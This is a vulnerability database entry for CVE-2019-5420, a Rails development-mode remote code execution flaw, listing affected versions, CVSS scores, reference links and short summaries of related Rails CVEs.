Vulnerability CVE-2019-5420


Published: 2019-03-27

Description:
A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit.

See advisories in our WLB2 database:
Topic
Author
Date
High
Ruby On Rails DoubleTap Development Mode secret_key_base Remote Code Execution
sinn3r
02.05.2019

Type:

CWE-20

(Improper Input Validation)

Vendor: Debian
Product: Debian linux 
Version: 8.0;
Vendor: Rubyonrails
Product: Rails 
Version:
6.0.0
5.2.3
5.2.2
5.2.1.1
5.2.1
5.2.0
5.1.7
5.1.6.2
5.1.6.1
5.1.6
5.1.5
5.1.4
5.1.3
5.1.2
5.1.1
5.1.0
5.0.7.2
5.0.7.1
5.0.7
5.0.6
5.0.5
5.0.4
5.0.3
5.0.2
5.0.1
5.0.0.1
5.0.0
4.2.9
4.2.8
4.2.7.1
4.2.7
4.2.6
4.2.5.2
4.2.5.1
4.2.5
4.2.4
4.2.3
4.2.2
4.2.11.1
4.2.11
4.2.10
4.2.1
4.2.0
4.1.9
4.1.8
4.1.7.1
4.1.7
4.1.6
4.1.5
4.1.4
4.1.3
4.1.2
4.1.16
4.1.15
4.1.14.2
4.1.14.1
4.1.14
4.1.13
4.1.12
4.1.11
4.1.10
4.1.1
4.1.0
4.0.9
4.0.8
4.0.7
4.0.6
4.0.5
4.0.4
4.0.3
4.0.2
4.0.13
4.0.12
4.0.11.1
4.0.11
4.0.10
4.0.1
4.0.0
3.2.9
3.2.8
3.2.7
3.2.6
3.2.5
3.2.4
3.2.3
3.2.22.5
3.2.22.4
3.2.22.3
3.2.22.2
3.2.22.1
3.2.22
3.2.21
3.2.20
3.2.2
3.2.19
3.2.18
3.2.17
3.2.16
3.2.15
See more versions on NVD

CVSS2 => (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

 References:
http://packetstormsecurity.com/files/152704/Ruby-On-Rails-DoubleTap-Development-Mode-secret_key_base-Remote-Code-Execution.html
https://groups.google.com/forum/#!topic/rubyonrails-security/IsQKvDqZdKw
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y43636TH4D6T46IC6N2RQVJTRFJAAYGA/
https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
https://www.exploit-db.com/exploits/46785/

Related CVE
CVE-2019-5419
There is a possible denial of service vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause action view to consume 100% cpu and make the server unresponsive.
CVE-2019-5418
There is a File Content Disclosure vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.
CVE-2018-16477
A bypass vulnerability in Active Storage >= 5.2.0 for Google Cloud Storage and Disk services allow an attacker to modify the `content-disposition` and `content-type` parameters which can be used in with HTML files and have them executed inline. Addit...
CVE-2018-16476
A Broken Access Control vulnerability in Active Job versions >= 4.2.0 allows an attacker to craft user input which can cause Active Job to deserialize it using GlobalId and give them access to information that they should not have. This vulnerability...
CVE-2018-3741
There is a possible XSS vulnerability in all rails-html-sanitizer gem versions below 1.0.4 for Ruby. The gem allows non-whitelisted attributes to be present in sanitized output when input with specially-crafted HTML fragments, and these attributes ca...
CVE-2017-17920
** DISPUTED ** SQL injection vulnerability in the 'reorder' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter. NOTE: The vendor disputes this issue because the documentation s...
CVE-2017-17919
** DISPUTED ** SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter. NOTE: The vendor disputes this issue because the documentation ...
CVE-2017-17917
** DISPUTED ** SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation state...

Copyright 2019, cxsecurity.com

 

Back to Top